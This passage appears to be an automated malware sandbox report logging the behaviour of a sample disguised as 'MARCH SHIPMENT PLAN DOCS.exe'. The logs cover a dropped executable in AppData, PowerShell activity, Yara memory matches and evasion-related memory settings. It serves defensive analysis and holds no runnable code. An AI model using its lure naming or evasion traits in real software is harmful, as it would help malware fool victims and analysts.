              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeMemory allocated: 4CD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeMemory allocated: 8990000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeMemory allocated: 9990000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeMemory allocated: 9B80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeMemory allocated: AB80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeMemory allocated: 1750000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeMemory allocated: 50B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMemory allocated: 1210000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMemory allocated: 2C90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMemory allocated: 8830000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMemory allocated: 9830000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMemory allocated: 9A10000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMemory allocated: AA10000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMemory allocated: 1220000 memory reserve | memory write watch
